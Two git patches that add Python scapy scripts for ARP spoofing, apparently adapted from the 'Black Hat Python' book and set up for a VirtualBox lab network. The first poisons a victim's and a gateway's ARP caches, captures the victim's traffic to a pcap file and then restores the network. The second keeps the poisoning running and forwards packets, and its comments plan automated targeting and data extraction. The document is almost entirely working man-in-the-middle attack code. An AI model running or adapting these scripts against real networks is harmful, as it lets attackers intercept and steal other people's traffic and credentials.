From 2c22dfa9200866f73fbe4f45ecfde1d4df63dd78 Mon Sep 17 00:00:00 2001
From: Gurwinder Singh <gwinsingh@gmail.com>
Date: Tue, 23 Oct 2018 18:07:50 +0530
Subject: [PATCH 1/2] Update arp spoofing/arper_bhp.py

Captures the traffic between the victim and the gateway.
Captured traffic is written to "arper.pcap"
---
 arp spoofing/arper_bhp.py | 107 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 107 insertions(+)
 create mode 100644 arp spoofing/arper_bhp.py

diff --git a/arp spoofing/arper_bhp.py b/arp spoofing/arper_bhp.py
new file mode 100644
index 0000000..8431a6c
--- /dev/null
+++ b/arp spoofing/arper_bhp.py	
@@ -0,0 +1,107 @@
+from scapy.all import *
+import os
+import sys
+import threading
+
+interface    = "vboxnet0"
+target_ip = "192.168.56.103"
+target_mac = "08:00:27:1c:c5:d7"
+gateway_ip = "192.168.56.102"
+gateway_mac = "08:00:27:99:9c:9b"
+packet_count = 100
+poisoning    = True
+    
+def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
+    
+    # slightly different method using send
+    print "[*] Restoring target..."
+    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
+    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
+    
+def get_mac(ip_address):
+    
+    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
+    
+    # return the MAC address from a response
+    for s,r in responses:
+        return r[Ether].src
+    
+    return None
+    
+def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
+    global poisoning
+   
+    poison_target = ARP()
+    poison_target.op   = 2
+    poison_target.psrc = gateway_ip
+    poison_target.pdst = target_ip
+    poison_target.hwdst= target_mac
+
+    poison_gateway = ARP()
+    poison_gateway.op   = 2
+    poison_gateway.psrc = target_ip
+    poison_gateway.pdst = gateway_ip
+    poison_gateway.hwdst= gateway_mac
+
+    print "[*] Beginning the ARP poison. [CTRL-C to stop]"
+
+    while poisoning:
+        send(poison_target)
+        send(poison_gateway)
+          
+        time.sleep(2)
+          
+    print "[*] ARP poison attack finished."
+
+    return
+
+# set our interface
+conf.iface = interface
+
+# turn off output
+conf.verb  = 0
+
+print "[*] Setting up %s" % interface
+
+gateway_mac = get_mac(gateway_ip)
+
+if gateway_mac is None:
+    print "[!!!] Failed to get gateway MAC. Exiting."
+    sys.exit(0)
+else:
+    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
+
+target_mac = get_mac(target_ip)
+
+if target_mac is None:
+    print "[!!!] Failed to get target MAC. Exiting."
+    sys.exit(0)
+else:
+    print "[*] Target %s is at %s" % (target_ip,target_mac)
+    
+# start poison thread
+poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
+poison_thread.start()
+
+try:
+    print "[*] Starting sniffer for %d packets" % packet_count
+    
+    bpf_filter  = "ip host %s" % target_ip
+    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
+    
+except KeyboardInterrupt:
+    pass
+
+finally:
+    # write out the captured packets
+    print "[*] Writing packets to arper.pcap"
+    wrpcap('arper.pcap',packets)
+
+    poisoning = False
+
+    # wait for poisoning thread to exit
+    time.sleep(2)
+
+    # restore the network
+    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
+    sys.exit(0)

From 265ff31be137ad69c2e5bc5c2e2e4d765feb4d5e Mon Sep 17 00:00:00 2001
From: Gurwinder Singh <gwinsingh@gmail.com>
Date: Tue, 23 Oct 2018 18:13:43 +0530
Subject: [PATCH 2/2] Update arp spoofing/keep_arping.py

Keeps the targets poisoned.
In order to do that, we need to keep sending fake ARP packets to both the victims continously to maintain a poisoned cache.
---
 arp spoofing/keep_arping.py | 70 +++++++++++++++++++++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 arp spoofing/keep_arping.py

diff --git a/arp spoofing/keep_arping.py b/arp spoofing/keep_arping.py
new file mode 100644
index 0000000..f992d37
--- /dev/null
+++ b/arp spoofing/keep_arping.py	
@@ -0,0 +1,70 @@
+from scapy.all import *
+import threading
+
+
+# Write Script for arping targets
+# Test it on Local Machines
+# Automate it for given IP
+# Automatically Detect IPs
+# Extract data from Traffic
+
+target_ip = "192.168.56.103"
+target_mac = "08:00:27:1c:c5:d7"
+gateway_ip = "192.168.56.102"
+gateway_mac = "08:00:27:99:9c:9b"
+
+
+temp = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
+
+
+
+poisoning = True
+
+
+
+
+def process_packet(pkt):
+	if pkt.src == target_mac:
+		pkt.dst = gateway_mac
+		sendp(pkt)
+	if pkt.src == gateway_mac:
+		pkt.dst = target_mac
+		sendp(pkt)
+
+
+
+
+def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
+	global poisoning
+
+	print "[*] Beginning the ARP poison. [CTRL-C to stop]"
+
+	while poisoning:
+		try:
+			send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac))
+			send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac))
+			time.sleep(2)
+		except KeyboardInterrupt as e:
+			print "[*] ARP poison attack finished."
+			return
+			pass
+		finally:
+			print "[*] ARP poison attack finished."
+	return
+
+
+def get_mac(ip_address, iface="eth1"):
+
+	responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10,iface=iface)
+
+	# return the MAC address from a response
+	for s,r in responses:
+		return r[Ether].src
+
+	return None
+
+
+
+# start poison thread
+poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
+poison_thread.start()